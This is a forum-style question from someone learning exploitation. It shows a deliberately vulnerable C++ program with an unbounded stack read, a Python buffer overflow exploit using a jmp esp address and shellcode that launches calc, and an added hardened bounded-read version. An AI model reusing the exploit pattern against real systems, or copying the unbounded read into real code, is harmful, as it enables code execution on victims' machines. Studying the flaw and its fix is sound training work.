I am in the process of writing my first ever buffer overflow exploit for training purposes, but I can't seem to figure it out, and my exploits only crash without any useful output, so I am asking for your help.
```cpp
// the compiled executable is called exec.exe
#include <iostream>
using namespace std;
int main()
{
    char buff[256];
    cin >> buff;   // unbounded read into a fixed-size stack buffer
    cout << buff;
    return 0;
}
```
This code takes a user input and writes it to the buffer allocated by the program, as far as I know.
Now I figured out the offset to be 268, that's 256 + 12. Using Immunity Debugger I found two jmp esp addresses and tried using them as the EIP (the return address in the exploit code).
```python
from subprocess import *
import struct

p = Popen(['exec.exe'], stdout=PIPE, stdin=PIPE)
EIP = struct.pack("I", 0x6eb51e62)   # jmp esp address found in Immunity Debugger
pad = b"\x42"*145
shellcode = b"\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
out_put = pad+EIP+shellcode
p.communicate(out_put)
```
The length of the out_put is 268.
This shellcode opens a calculator.
I tried to increase the padding but was not successful.
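For contrast, here is the hardened form of the `cin >> buff` line from the target program above. This is an added example, not code from the post: setting the stream width to the array size makes `operator>>` stop after at most 255 characters and null-terminate, so oversized input can no longer run past `buff` into the saved return address. The `demo_bounded_read` helper, its canary word and the 400-byte input are constructed here for the demonstration.

```cpp
#include <cstring>
#include <iomanip>
#include <iostream>
#include <sstream>
#include <string>

// Bounded replacement for the page's `cin >> buff`: the stream width limits
// extraction to N-1 characters plus a terminating NUL (width resets after use).
template <std::size_t N>
void read_token_bounded(std::istream& in, char (&buf)[N]) {
    in >> std::setw(static_cast<int>(N)) >> buf;
}

// Result of one demonstration read.
struct ReadResult {
    std::size_t stored;    // characters actually stored in the 256-byte buffer
    bool canary_intact;    // true if nothing was written past the array
};

// Place a 256-byte buffer directly in front of a canary word (constructed
// stand-in for the saved frame data), read the input, and check the canary.
ReadResult demo_bounded_read(const std::string& input) {
    struct { char buff[256]; unsigned canary; } frame{};
    frame.canary = 0xDEADBEEF;
    std::istringstream in(input);
    read_token_bounded(in, frame.buff);
    return { std::strlen(frame.buff), frame.canary == 0xDEADBEEF };
}

// Alternative that needs no fixed-size array at all: let std::string grow.
std::string read_token_dynamic(std::istream& in) {
    std::string token;
    in >> token;
    return token;
}

int main() {
    std::string oversized(400, 'A');   // constructed input, longer than buff
    ReadResult r = demo_bounded_read(oversized);
    std::cout << "stored " << r.stored << " chars, canary "
              << (r.canary_intact ? "intact" : "CLOBBERED") << '\n';
    return 0;
}
```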